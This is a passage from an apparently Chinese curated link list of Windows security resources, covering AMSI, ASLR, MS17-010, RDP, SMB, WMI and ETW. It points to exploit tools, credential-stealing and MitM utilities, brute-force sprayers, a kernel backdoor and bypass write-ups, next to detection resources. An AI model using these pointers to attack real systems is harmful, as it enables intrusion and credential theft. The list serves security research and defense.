WMI](https://posts.specterops.io/antimalware-scan-interface-detection-optics-analysis-methodology-858c37c38383) - 2019.10 [4hou] [看我如何一步步将基于堆的 AMSI 绕过做到接近完美](https://www.4hou.com/system/20700.html) - 2019.10 [specterops] [Antimalware Scan Interface Detection Optics Analysis Methodology](https://medium.com/p/858c37c38383) - 2019.09 [byte] [Adventures in the Wonderful World of AMSI.](https://medium.com/p/25d235eb749c) - 2019.08 [4hou] [绕过AMSI的全套操作过程](https://www.4hou.com/web/18619.html) - 2019.08 [mcafee] [McAfee AMSI Integration Protects Against Malicious Scripts](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/) - 2019.08 [mcafee] [McAfee AMSI Integration Protects Against Malicious Scripts](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/) - 2019.07 [codewhitesec] [Heap-based AMSI bypass for MS Excel VBA and others](https://codewhitesec.blogspot.com/2019/07/heap-based-amsi-bypass-in-vba.html) - 2019.07 [f] [Hunting for AMSI bypasses](https://blog.f-secure.com/hunting-for-amsi-bypasses/) - 2019.06 [360] [如何绕过AMSI](https://www.anquanke.com/post/id/180281/) - 2019.06 [contextis] [AMSI Bypass](https://www.contextis.com/en/blog/amsi-bypass) - 2019.06 [aliyun] [How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code](https://xz.aliyun.com/t/5351) - 2019.06 [360] [如何绕过AMSI及WLDP](https://www.anquanke.com/post/id/179832/) - 2019.05 [benoit] [Alternative AMSI bypass](https://medium.com/p/554dc61d70b1) - 2019.04 [4hou] [如何绕过AMSI for VBA](https://www.4hou.com/technology/17638.html) *** ## <a id="b1324e23dc1b1314c3674203af4cb147"></a>Address Space Layout Randomization(ASLR) ### <a id="92a9071fd688be4888c2fbd493ae2d26"></a>工具 - [**901**星][2m] [Roff] [slimm609/checksec.sh](https://github.com/slimm609/checksec.sh) 检查可执行文件(PIE, RELRO, PaX, Canaries, ASLR, Fortify Source)属性的 bash 脚本 - [**371**星][12d] [PS] [netspi/pesecurity](https://github.com/netspi/pesecurity) 检查PE(EXE/DLL)编译选项是否有:ASLR, DEP, SafeSEH, StrongNaming, Authenticode。PowerShell模块 ### <a id="530581a7d5ef7c27b168a7f86ff642af"></a>文章 - 2019.12 [johnlatwc] [Early Security Stories — ASLR](https://medium.com/p/4c6bafe0dda1) - 2019.10 [HackersOnBoard] [Black Hat USA 2016 Breaking Kernel Address Space Layout Randomization KASLR With Intel TSX](https://www.youtube.com/watch?v=K8nt67X1ahk) - 2019.06 [arxiv] [[1906.10478] From IP ID to Device ID and KASLR Bypass (Extended Version)](https://arxiv.org/abs/1906.10478) - 2019.06 [securityevaluators] [ASUSWRT RCE via Buffer Overflow, ASLR Bypass](https://blog.securityevaluators.com/asuswrt-buffer-overflow-format-string-aslr-bypass-2bbf9736fe46) - 2019.06 [openanalysis] [Disable ASLR for Easier Malware Debugging With x64dbg and IDA Pro](https://oalabs.openanalysis.net/2019/06/12/disable-aslr-for-easier-malware-debugging/) - 2019.06 [OALabs] [Disable ASLR For Easier Malware Debugging With x64dbg and IDA Pro](https://www.youtube.com/watch?v=DGX7oZvdmT0) - 2019.04 [4hou] [利用ASLR薄弱点:Chrome沙箱逃逸漏洞分析](https://www.4hou.com/system/17424.html) - 2019.03 [offensive] [Development of a new Windows 10 KASLR Bypass (in One WinDBG Command)](https://www.offensive-security.com/vulndev/development-of-a-new-windows-10-kaslr-bypass-in-one-windbg-command/) - 2019.03 [notsoshant] [Windows Exploitation: ASLR Bypass (MS07–017)](https://medium.com/p/8760378e3e84) - 2019.02 [rce4fun] [VirtualProtectEx to bypass ASLR : A specific case study](http://rce4fun.blogspot.com/2019/02/virtualprotectex-to-bypass-aslr.html) - 2019.01 [aliyun] [静态链接可执行文件的ASLR保护机制](https://xz.aliyun.com/t/3752) - 2018.11 [pediy] [[原创] CVE-2014-0322 IE与Flash结合利用 绕过ASLR+DEP](https://bbs.pediy.com/thread-248057.htm) - 2018.11 [pediy] [[原创]CVE-2012-1889 Win7 通过GUID加载dll库绕过ASLR+DEP](https://bbs.pediy.com/thread-247975.htm) - 2018.11 [securityevaluators] [ASUSWRT Buffer Overflow, Format String ASLR Bypass](https://medium.com/p/2bbf9736fe46) - 2018.10 [osandamalith] [PE Sec Info – A Simple Tool to Manipulate ASLR and DEP Flags](https://osandamalith.com/2018/10/24/pe-sec-info-a-simple-tool-to-manipulate-aslr-and-dep-flags/) - 2018.08 [cmu] [When "ASLR" Is Not Really ASLR - The Case of Incorrect Assumptions and Bad Defaults](https://insights.sei.cmu.edu/cert/2018/08/when-aslr-is-not-really-aslr---the-case-of-incorrect-assumptions-and-bad-defaults.html) - 2018.06 [teamultimate] [Return to PLT, GOT to bypass ASLR remotely](https://teamultimate.in/return-to-plt-got-to-bypass-aslr-remote/) - 2018.06 [teamultimate] [Format String Exploits: Defeating Stack Canary, NX and ASLR Remotely on 64 bit](https://teamultimate.in/format-string-defeating-stack-canary-nx-aslr-remote/) - 2018.06 [nul] [Linux ASLR的一些实验 (1)](http://www.nul.pw/2018/06/09/263.html) - 2018.05 [pediy] [[翻译]绕过 ASLR + NX 第一部分](https://bbs.pediy.com/thread-226637.htm) *** ## <a id="6fc6d2a82e58d5a0daa258dd87190fe5"></a>Control Flow Guard ### <a id="5e156e74fbac1a857251ad7349fa55fe"></a>工具 *** ## <a id="87d619895642fc563b2b31154ade189a"></a>Control Integrity Guard *** ## <a id="d1798993715e3e3a240884b7ff04b45d"></a>其他 # <a id="7571369f732a6a16dfe727626709f702"></a>MS1X *** ## <a id="a00506bcb946ba1c14c0747407dd2570"></a>工具 - [**345**星][4m] [Py] [3ndg4me/autoblue-ms17-010](https://github.com/3ndg4me/autoblue-ms17-010) This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010 - [**254**星][17d] [Py] [mez-0/ms17-010-python](https://github.com/mez-0/MS17-010-Python) MS17-010: Python and Meterpreter *** ## <a id="e08e4392157e48200f68d6e16e31c524"></a>文章 - 2020.02 [LoiLiangYang] [Exploiting Windows 10 with MS17_010_PSEXEC](https://www.youtube.com/watch?v=7-3k7AGTHPQ) - 2010.04 [g] [MS10-020](http://g-laurent.blogspot.com/2010/04/ms10-020.html) - 2010.04 [sans] [MS10-021: Encountering A Failed WinXP Update](https://isc.sans.edu/forums/diary/MS10021+Encountering+A+Failed+WinXP+Update/8644/) - 2010.03 [sans] [OOB Update for Internet Explorer MS10-018](https://isc.sans.edu/forums/diary/OOB+Update+for+Internet+Explorer+MS10018/8533/) - 2010.02 [sans] [MS10-015 may cause Windows XP to blue screen (but only if you have malware on it)](https://isc.sans.edu/forums/diary/MS10015+may+cause+Windows+XP+to+blue+screen+but+only+if+you+have+malware+on+it/8266/) - 2010.02 [g] [More details on MS10-006](http://g-laurent.blogspot.com/2010/02/more-details-on-ms10-006.html) - 1970.01 [] [[MS15-010 / CVE-2015-0057] Exploitation](http://0day5.com/archives/3631/) # <a id="73aa875eba0a61328cda48b6d2b96135"></a>系统机制 *** ## <a id="d8eb297358353fd465b9b6914327fc0c"></a>RDP ### <a id="f8078be0204bcc6c4b88b389d5e169d7"></a>工具 - [**6407**星][1y] [Pascal] [stascorp/rdpwrap](https://github.com/stascorp/rdpwrap) RDP Wrapper Library - [**3800**星][9d] [C] [freerdp/freerdp](https://github.com/freerdp/freerdp) FreeRDP is a free remote desktop protocol library and clients - [**1655**星][21d] [C] [neutrinolabs/xrdp](https://github.com/neutrinolabs/xrdp) xrdp: an open source RDP server - [**1083**星][9d] [C] [zerosum0x0/cve-2019-0708](https://github.com/zerosum0x0/cve-2019-0708) Scanner PoC for CVE-2019-0708 RDP RCE vuln - [**996**星][1m] [Py] [syss-research/seth](https://github.com/syss-research/seth) Perform a MitM attack and extract clear text credentials from RDP connections - [**911**星][13d] [Py] [jimmy201602/webterminal](https://github.com/jimmy201602/webterminal) ssh rdp vnc telnet sftp bastion/jump web putty xshell terminal jumpserver audit realtime monitor rz/sz 堡垒机 云桌面 linux devops sftp websocket file management rz/sz otp 自动化运维 审计 录像 文件管理 sftp上传 实时监控 录像回放 网页版rz/sz上传下载/动态口令 django - [**764**星][10d] [C] [rdesktop/rdesktop](https://github.com/rdesktop/rdesktop) rdesktop is an open source UNIX client for connecting to Windows Remote Desktop Services, capably of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop. rdesktop is known to work with Windows server version ranging from NT 4 terminal server to Windows 2012 R2. - [**692**星][13d] [C] [robertdavidgraham/rdpscan](https://github.com/robertdavidgraham/rdpscan) A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability. - [**433**星][9d] [C++] [0x09al/rdpthief](https://github.com/0x09al/rdpthief) Extracting Clear Text Passwords from mstsc.exe using API Hooking. - [**378**星][15d] [C#] [beckzhu/simpleremote](https://github.com/beckzhu/simpleremote) 远程管理工具。轻量级、选项卡式、免费、开源的远程连接管理工具,支持RDP、SSH、Telnet协议 - [**376**星][13d] [Py] [gosecure/pyrdp](https://github.com/gosecure/pyrdp) RDP man-in-the-middle (mitm) and library for Python 3 with the ability to watch connections live or after the fact - [**339**星][21d] [PS] [joelgmsec/autordpwn](https://github.com/joelgmsec/autordpwn) The Shadow Attack Framework - [**296**星][9d] [Py] [xfreed0m/rdpassspray](https://github.com/xfreed0m/rdpassspray) Python3 tool to perform password spraying using RDP - [**283**星][8m] [Py] [k8gege/cve-2019-0708](https://github.com/k8gege/cve-2019-0708) 3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check) ### <a id="789aa51ac9d9c559e587cbd6ae85af8a"></a>文章 - 2019.05 [fortinet] [CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep](https://www.fortinet.com/blog/threat-research/cve-20190708-remote-desktop-protocol-and-code-execution-bluekeep.html) - 2018.07 [mcafee] [Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/organizations-leave-backdoors-open-to-cheap-remote-desktop-protocol-attacks/) - 2018.04 [fireeye] [Establishing a Baseline for Remote Desktop Protocol](http://www.fireeye.com/blog/threat-research/2018/04/establishing-a-baseline-for-remote-desktop-protocol.html) - 2017.12 [blackmoreops] [Hacking remote desktop protocol using rdpy](https://www.blackmoreops.com/2017/12/12/hacking-remote-desktop-protocol-using-rdpy/) - 2017.11 [esecurityplanet] [Flood of Attacks Spread Ransomware via Remote Desktop Protocol](https://www.esecurityplanet.com/threats/new-attacks-spread-ransomware-via-remote-desktop-protocol.html) - 2017.03 [4hou] [如何悄无声息的对RDP和远程会话进行劫持?](http://www.4hou.com/info/news/3898.html) - 2017.03 [korznikov] [Windows全平台会话劫持](http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html) - 2017.02 [trendmicro] [Brute Force RDP Attacks Plant CRYSIS Ransomware](https://blog.trendmicro.com/trendlabs-security-intelligence/brute-force-rdp-attacks-plant-crysis-ransomware/) - 2016.12 [sensepost] [XRDP: Exploiting Unauthenticated X Windows Sessions](https://sensepost.com/blog/2016/xrdp-exploiting-unauthenticated-x-windows-sessions/) - 2016.11 [digi] [Windows RDP client, show login page](https://digi.ninja/blog/rdp_show_login_page.php) - 2016.11 [webroot] [RDP Attacks: What You Need to Know and How to Protect Yourself](https://www.webroot.com/blog/2016/11/23/remote-desktop-protocol-attacks-need-know/) - 2016.11 [whereisk0shl] [Cain RDP缓冲区溢出漏洞(CVE-2008-5405)](http://whereisk0shl.top/post/2016-11-05) - 2016.08 [id] [Anti-1C, RDP-WinRAR](http://id-ransomware.blogspot.com/2017/11/anti-1c-ransomware.html) - 2016.07 [freebuf] [RDP连接降级攻击以及规避方法解析](http://www.freebuf.com/articles/system/108346.html) - 2016.06 [duo] [Protecting Remote Access to Your Computer: RDP Attacks and Server Credentials for Sale](https://duo.com/blog/protecting-remote-access-to-your-computer-rdp-attacks-and-server-credentials-for-sale) - 2016.05 [willgenovese] [SSH Tunneling RDP Using Putty](http://willgenovese.com/ssh-tunneling-rdp-using-putty/) - 2016.05 [fox] [Ransomware deployments after brute force RDP attack](https://blog.fox-it.com/2016/05/02/ransomware-deployments-after-brute-force-rdp-attack/) - 2016.04 [portcullis] [Downgrading RDP connections and how to avoid it](https://labs.portcullis.co.uk/blog/downgrading-rdp-connections-and-how-to-avoid-it/) - 2016.04 [contextis] [RDP Replay Code Release](https://www.contextis.com/blog/rdp-replay-code-release) - 2016.01 [securestate] [Scripting RDP for Pillaging and Potato](https://warroom.securestate.com/scripting-rdp/) ### <a id="4ece6a5ac5b1176456fe44100a8b18d7"></a>文章_0 - 2019.12 [welivesecurity] [It’s time to disconnect RDP from the internet | WeLiveSecurity](https://www.welivesecurity.com/2019/12/17/bluekeep-time-disconnect-rdp-internet/) - 2019.12 [4hou] [预警!Windows BlueKeep RDP来了!](https://www.4hou.com/system/22078.html) - 2019.12 [talosintelligence] [Microsoft Remote Desktop Services (RDP8) license negotiation denial-of-service vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2019-0901) - 2019.12 [talosintelligence] [Microsoft Remote Desktop Services (RDP7) Windows XP Multiple Information Leak Vulnerabilities](https://talosintelligence.com/vulnerability_reports/TALOS-2019-0895) - 2019.12 [talosintelligence] [Vulnerability Spotlight: Two vulnerabilities in RDP for Windows 7, XP](https://blog.talosintelligence.com/2019/12/vuln-spotlight-RDP-Dec-19.html) - 2019.12 [4hou] [Reverse RDP攻击:Hyper-V Connection](https://www.4hou.com/technology/19747.html) - 2019.11 [freebuf] [RDP远程漏洞(CVE-2019-0708)被发现野外利用来挖矿](https://www.freebuf.com/articles/system/218963.html) - 2019.11 [venus] [通过RDP反向攻击mstsc](https://paper.seebug.org/1074/) - 2019.11 [rapid7] [Securing RDP Vulnerabilities: Learnings from Bluekeep and DejaBlue](https://blog.rapid7.com/2019/11/07/the-anatomy-of-rdp-exploits-lessons-learned-from-bluekeep-and-dejablue/) - 2019.11 [fortinet] [BlueKeep RDP Attacks are Starting – Patch CVE-2019-0708 Now](https://www.fortinet.com/blog/threat-research/bluekeep-rdp-attacks-starting-patch-now.html) - 2019.09 [venus] [RDP 登录日志取证与清除](https://paper.seebug.org/1043/) - 2019.09 [aliyun] [RDP登录日志取证与清除](https://xz.aliyun.com/t/6421) - 2019.09 [webroot] [Cyber News Rundown: TFlower Ransomware Exploiting RDP](https://www.webroot.com/blog/2019/09/20/cyber-news-rundown-tflower-ransomware-exploiting-rdp/) - 2019.09 [freebuf] [Seth:执行MitM攻击并从RDP连接中提取明文凭证](https://www.freebuf.com/sectool/212918.html) - 2019.09 [hakin9] [PyRDP - Python 3 Remote Desktop Protocol (RDP) Man-in-the-Middle (MITM) and library](https://hakin9.org/pyrdp-python-3-remote-desktop-protocol-rdp-man-in-the-middle-mitm-and-library/) - 2019.09 [4hou] [RDP漏洞或引发大规模蠕虫爆发,用户可用阿里云免费检测服务,请尽快修复](https://www.4hou.com/info/news/20231.html) - 2019.09 [4sysops] [Azure Redeploy: If RDP or application access to an Azure VM fails](https://4sysops.com/archives/azure-redeploy-if-rdp-or-application-access-to-an-azure-vm-fails/) - 2019.09 [tencent] [腾讯安全发布高危预警:Crysis勒索病毒利用RDP爆破攻击加剧](https://s.tencent.com/research/report/796.html) - 2019.08 [malwaretech] [DejaBlue: Analyzing a RDP Heap Overflow](https://www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html) - 2019.08 [freebuf] [微软RDP远程代码执行漏洞(CVE-2019-0708)分析集锦](https://www.freebuf.com/vuls/205380.html) *** ## <a id="2ccd7ff9d95435e841f8c667dda1338e"></a>SMB ### <a id="1d122fd6dda9ebbd4ee460facbaf1d4d"></a>工具 - [**1215**星][1m] [C#] [k8gege/ladon](https://github.com/k8gege/ladon) 用于大型网络渗透的多线程插件化综合扫描神器 - [**820**星][1y] [PS] [kevin-robertson/invoke-thehash](https://github.com/kevin-robertson/invoke-thehash) 执行 pass the hash WMI 和 SMB 任务的PowerShell函数 - [**767**星][2m] [Py] [shawndevans/smbmap](https://github.com/shawndevans/smbmap) SMB枚举 - [**388**星][12d] [C] [zerosum0x0/smbdoor](https://github.com/zerosum0x0/smbdoor) Windows kernel backdoor via registering a malicious SMB handler - [**355**星][3m] [Py] [m8r0wn/nullinux](https://github.com/m8r0wn/nullinux) SMB null 会话识别和枚举工具 - [**348**星][11m] [Py] [skorov/ridrelay](https://github.com/skorov/ridrelay) 通过使用具有低priv的SMB中继来枚举您没有信誉的域上的用户名。 - [**322**星][8m] [C#] [raikia/credninja](https://github.com/raikia/credninja) A multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at-scale via SMB, plus now with a user hunter - [**255**星][19d] [PS] [p3nt4/invoke-piper](https://github.com/p3nt4/Invoke-Piper) Forward local or remote tcp ports through SMB pipes. - [**225**星][3m] [Py] [m4ll0k/smbrute](https://github.com/m4ll0k/smbrute) SMB Protocol Bruteforce - [**210**星][3m] [Py] [miketeo/pysmb](https://github.com/miketeo/pysmb) pysmb is an experimental SMB/CIFS library written in Python. It implements the client-side SMB/CIFS protocol (SMB1 and SMB2) which allows your Python application to access and transfer files to/from SMB/CIFS shared folders like your Windows file sharing and Samba folders. ### <a id="3832aa4bcf779dc33fed9dcd71129a59"></a>文章 - 2013.12 [trendmicro] [FBI details major trends in cyber attacks against SMB’s](http://blog.trendmicro.com/fbi-details-major-trends-cyber-attacks-smbs/) - 2013.11 [sophos] [Ponemon Institute: Management uncertainty, lack of security expertise put SMBs at risk](https://news.sophos.com/en-us/2013/11/19/ponemon-institute-management-uncertainty-lack-of-security-expertise-put-smbs-at-risk/) - 2013.10 [thomasmaurer] [EMC – SMB 3.0 is the Future of Storage](https://www.thomasmaurer.ch/2013/10/emc-smb-3-0-is-the-future-of-storage/) - 2013.07 [pediy] [[原创]实验:SMB抓包破解windows登陆密码](https://bbs.pediy.com/thread-176189.htm) - 2013.06 [microsoft] [Cloud Trust Study: Top of the hill Security, Privacy and Reliability benefits for SMBs in Germany](https://cloudblogs.microsoft.com/microsoftsecure/2013/06/13/cloud-trust-study-top-of-the-hill-security-privacy-and-reliability-benefits-for-smbs-in-germany/) - 2013.06 [intercepter] [Актуальность атаки SMBRelay в современных Windows сетях](http://intercepter-ng.blogspot.com/2013/06/smbrelay-windows.html) - 2013.06 [microsoft] [Cloud Trust Study: SMBs in France echo Security, Privacy and Reliability Benefits of Cloud Computing](https://cloudblogs.microsoft.com/microsoftsecure/2013/06/12/cloud-trust-study-smbs-in-france-echo-security-privacy-and-reliability-benefits-of-cloud-computing/) - 2013.06 [microsoft] [Blue Skies in London: Cloud Security, Privacy and Reliability Perceptions of SMBs in the U.K](https://cloudblogs.microsoft.com/microsoftsecure/2013/06/11/blue-skies-in-london-cloud-security-privacy-and-reliability-perceptions-of-smbs-in-the-u-k/) - 2013.04 [microsoft] [SMB CTO Reports on Security Management and Green IT with the Cloud](https://cloudblogs.microsoft.com/microsoftsecure/2013/04/23/smb-cto-reports-on-security-management-and-green-it-with-the-cloud/) - 2013.01 [trendmicro] [2013 Security Predictions: What Should Small and Medium Businesses (SMB) Look Out For?](https://blog.trendmicro.com/trendlabs-security-intelligence/2013-security-predictions-what-should-small-and-medium-businesses-smb-look-out-for/) - 2013.01 [trendmicro] [Securing Your First Server: What SMBs Need to Know](http://blog.trendmicro.com/securing-your-first-server-what-smbs-need-to-know/) - 2012.12 [netspi] [Executing SMB Relay Attacks via SQL Server using Metasploit](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) - 2012.12 [bogner] [SMBX: Where is my smb.conf](https://bogner.sh/2012/12/smbx-where-is-my-smb-conf/) - 2012.12 [trendmicro] [Mobile Security for the SMB: Mac vs. Android Threats](http://blog.trendmicro.com/mobile-security-for-the-smb-mac-vs-android-threats/) - 2012.11 [] [SMB ATTACK 绕过安全软件的访问](http://www.91ri.org/4783.html) - 2012.10 [trendmicro] [How the Cloud is Affecting SMB Channel Partners](http://blog.trendmicro.com/how-the-cloud-is-affecting-smb-channel-partners/) - 2012.08 [welivesecurity] [The Cloud for SMBs: 7 tips for safer cloud computing](https://www.welivesecurity.com/2012/08/24/the-cloud-for-smbs-7-tips-for-safer-cloud-computing/) - 2012.06 [freebuf] [利用Metasploit进行SMB版本的扫描](http://www.freebuf.com/articles/3948.html) - 2012.05 [microsoft] [Cloud Security Benefits for SMBs in Hong Kong](https://cloudblogs.microsoft.com/microsoftsecure/2012/05/24/cloud-security-benefits-for-smbs-in-hong-kong/) - 2012.05 [microsoft] [Cloud Security Benefits for SMBs in Asia](https://cloudblogs.microsoft.com/microsoftsecure/2012/05/24/cloud-security-benefits-for-smbs-in-asia/) *** ## <a id="25c0e7fba8e6523c9e60eaea718db391"></a>Windows Management Instrumentation(WMI) ### <a id="a44289a4715b50988ac7cbfc1fca0a92"></a>工具 - [**708**星][12d] [Go] [martinlindhe/wmi_exporter](https://github.com/martinlindhe/wmi_exporter) Prometheus exporter for Windows machines using WMI - [**706**星][1y] [PS] [arvanaghi/sessiongopher](https://github.com/Arvanaghi/SessionGopher) 使用WMI为远程访问工具(如WinSCP,PuTTY,SuperPuTTY,FileZilla和Microsoft远程桌面)提取保存的会话信息。PowerShell编写 - [**610**星][1y] [PS] [fortynorthsecurity/wmimplant](https://github.com/FortyNorthSecurity/WMImplant) This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based. - [**265**星][9d] [JS] [pandorafms/pandorafms](https://github.com/pandorafms/pandorafms) Pandora FMS is a flexible and highly scalable monitoring system ready for big environments. It uses agents (Linux, Windows, AIX, HP-UX, Solaris and BSD systems) and can do both local and remote network monitoring (SNMP v3, TCP checks, WMI, etc). - [**259**星][1m] [Go] [stackexchange/wmi](https://github.com/stackexchange/wmi) WMI for Go - [**251**星][1y] [C#] [0xbadjuju/wheresmyimplant](https://github.com/0xbadjuju/wheresmyimplant) A Bring Your Own Land Toolkit that Doubles as a WMI Provider ### <a id="78882a933dbf22785891fe26ea95feb1"></a>文章 - 2020.02 [darkoperator] [Getting DNS Client Cached Entries with CIM/WMI](https://www.darkoperator.com/blog/2020/1/14/getting-dns-client-cached-entries-with-cimwmi) - 2020.01 [pentestlab] [Persistence – WMI Event Subscription](https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/) - 2019.12 [randomascii] [O(n^2), again, now in WMI](https://randomascii.wordpress.com/2019/12/08/on2-again-now-in-wmi/) - 2019.11 [4hou] [新型入侵技术:使用WMI编译的“.bmf”文件和CertUtil进行混淆执行](https://www.4hou.com/technology/21376.html) - 2019.10 [4hou] [反恶意软件扫描接口检测分析方法论: 用于 WMI 的 AMSI 识别与分析](https://www.4hou.com/system/20714.html) - 2019.09 [4hou] [GhostMiner:无文件加密货币挖矿机武器化WMI对象](https://www.4hou.com/info/news/20505.html) - 2019.09 [trendmicro] [Fileless Cryptocurrency-Miner GhostMiner Weaponizes WMI Objects, Kills Other Cryptocurrency-Mining Payloads](https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/) - 2019.06 [lazywinadmin] [PowerShell - Joining WMI Classes in a query](https://lazywinadmin.com/2019/06/wmi_inner_join.html) - 2019.05 [mdsec] [Persistence: “the continued or prolonged existence of something”: Part 3 – WMI Event Subscription](https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-3-wmi-event-subscription/) - 2019.04 [carbonblack] [CB TAU Threat Intelligence Notification: Emotet Utilizing WMI to Launch PowerShell Encoded Code](https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/) - 2019.04 [rsa] [Detecting Lateral Movement in RSA NetWitness: WMI](https://community.rsa.com/community/products/netwitness/blog/2019/04/09/detecting-lateral-movement-in-rsa-netwitness-wmi) - 2019.03 [robtlee73] [Investigating WMI Attacks](https://www.youtube.com/watch?v=aBQ1vEjK6v4) - 2019.03 [ironcastle] [Special Webcast: Investigating WMI Attacks – March 7, 2019 3:30pm US/Eastern](https://www.ironcastle.net/special-webcast-investigating-wmi-attacks-march-7-2019-330pm-us-eastern/) - 2019.02 [sans] [Investigating WMI Attacks](https://digital-forensics.sans.org/blog/2019/02/09/investigating-wmi-attacks) - 2019.01 [fuzzysecurity] [wmic_info.bat](http://fuzzysecurity.com/scripts/13.html) - 2019.01 [hackingarticles] [Bypass Application Whitelisting using wmic.exe (Multiple Methods)](https://www.hackingarticles.in/bypass-application-whitelisting-using-wmic-exe-multiple-methods/) - 2019.01 [4hou] [如何检测并清除WMI持久化后门](http://www.4hou.com/technology/14024.html) - 2019.01 [sans] [Theres Something About WMI](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1492184420.pdf) - 2019.01 [sans] [There's Something About WMI](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1492187258.pdf) - 2019.01 [sans] [SIEMple Simon Met a WMIman](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1496762148.pdf) *** ## <a id="ac43a3ce5a889d8b18cf22acb6c31a72"></a>Event Tracing for Windows(ETW) ### <a id="0af4bd8ca0fd27c9381a2d1fa8b71a1f"></a>工具 - [**1303**星][12d] [JS] [jpcertcc/logontracer](https://github.com/jpcertcc/logontracer) 通过可视化和分析Windows事件日志来调查恶意的Windows登录 - [**885**星][16d] [C++] [google/uiforetw](https://github.com/google/uiforetw) User interface for recording and managing ETW traces - [**673**星][12m] [Roff] [palantir/windows-event-forwarding](https://github.com/palantir/windows-event-forwarding) 使用 Windows 事件转发实现网络事件监测和防御 - [**655**星][9d] [PS] [sbousseaden/evtx-attack-samples](https://github.com/sbousseaden/evtx-attack-samples) 与特定攻击和利用后渗透技术相关的Windows事件样例 - [**566**星][30d] [PS] [sans-blue-team/deepbluecli](https://github.com/sans-blue-team/deepbluecli) a PowerShell Module for Threat Hunting via Windows Event Logs - [**505**星][11m] [C#] [lowleveldesign/wtrace](https://github.com/lowleveldesign/wtrace) Command line tracing tool for Windows, based on ETW. - [**466**星][15d] [PS] [nsacyber/event-forwarding-guidance](https://github.com/nsacyber/Event-Forwarding-Guidance) 帮助管理员使用Windows事件转发(WEF)收集与安全相关的Windows事件日志 - [**401**星][12m] [Py] [williballenthin/python-evtx](https://github.com/williballenthin/python-evtx) 纯Python编写的Windows事件日志解析器 - [**318**星][3m] [C#] [zodiacon/procmonx](https://github.com/zodiacon/procmonx) 通过Windows事件日志获取与Process Monitor显示的相同的信息,无需内核驱动 - [**295**星][11d] [C#] [fireeye/silketw](https://github.com/fireeye/silketw) flexible C# wrappers for ETW - [**290**星][12m] [C#] [nsacyber/windows-event-log-messages](https://github.com/nsacyber/Windows-Event-Log-Messages) 检索Windows二进制文件中嵌入的Windows事件日志消息的定义,并以discoverable的格式提供它们 - [**268**星][5m] [C++] [gametechdev/presentmon](https://github.com/gametechdev/presentmon) Tool for collection and processing of ETW events related to DXGI presentation. - [**261**星][10d] [C++] [microsoft/krabsetw](https://github.com/microsoft/krabsetw) KrabsETW provides a modern C++ wrapper and a .NET wrapper around the low-level ETW trace consumption functions. ### <a id="11c4c804569626c1eb02140ba557bb85"></a>文章 - 2020.02 [vanimpe] [Parse stored Windows Event logs with Security Onion](https://www.vanimpe.eu/2020/02/12/parse-stored-windows-event-logs-with-security-onion/) - 2020.01 [X13Cubed] [CVEs in Windows Event Logs? What You Need to Know](https://www.youtube.com/watch?v=ebmW42YYveI) - 2020.01 [randomascii] [Bulk ETW Trace Analysis in C#](https://randomascii.wordpress.com/2020/01/05/bulk-etw-trace-analysis-in-c/) - 2019.12 [Cooper] [EventList, Matching Windows Event Log IDs With MITRE ATT&CK - Miriam Wiesner](https://www.youtube.com/watch?v=l5PpbOmopyA) - 2019.09 [adventuresincyberchallenges] [Powershell Encoded Payload In Clear Text in Windows Event Log 4688](https://adventuresincyberchallenges.blogspot.com/2019/09/powershell-encoded-payload-in-clear.html) - 2019.09 [Cyb3rWard0g] [Threat Hunting with ETW events and HELK — Part 2: Shipping ETW events to HELK ⚒](https://medium.com/p/16837116d2f5) - 2019.09 [Cyb3rWard0g] [Threat Hunting with ETW events and HELK — Part 1: Installing SilkETW 🏄‍♀🏄](https://medium.com/p/6eb74815e4a0) - 2019.06 [fox] [Export corrupts Windows Event Log files](https://blog.fox-it.com/2019/06/04/export-corrupts-windows-event-log-files/) - 2019.05 [freebuf] [SilkETW:一款针对Windows事件追踪的自定义C#封装工具](https://www.freebuf.com/sectool/203531.html) - 2019.04 [4sysops] [Forward Windows events to a Syslog server with free SolarWinds Event Log Forwarder for Windows](https://4sysops.com/archives/forward-windows-events-to-a-syslog-server-with-free-solarwinds-event-log-forwarder-for-windows/) - 2019.02 [360] [ETW注册表监控windows内核实现原理](https://www.anquanke.com/post/id/171298/) - 2019.01 [sans] [Rocking Your Windows EventID with ELK Stack](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1492181323.pdf) - 2019.01 [sans] [Threat Hunting via Windows Event Logs](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1524493093.pdf) - 2019.01 [sans] [Hunting for Lateral Movement Using Windows Event Log](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1536265369.pdf) - 2018.12 [palantir] [Tampering with Windows Event Tracing: Background, Offense, and Defense](https://medium.com/p/4be7ac62ac63) - 2018.12 [sophos] [Hunting for threats with Intercept X and the Windows Event Collector](https://news.sophos.com/en-us/2018/12/03/hunting-for-threats-with-intercept-x-and-the-windows-event-collector/) - 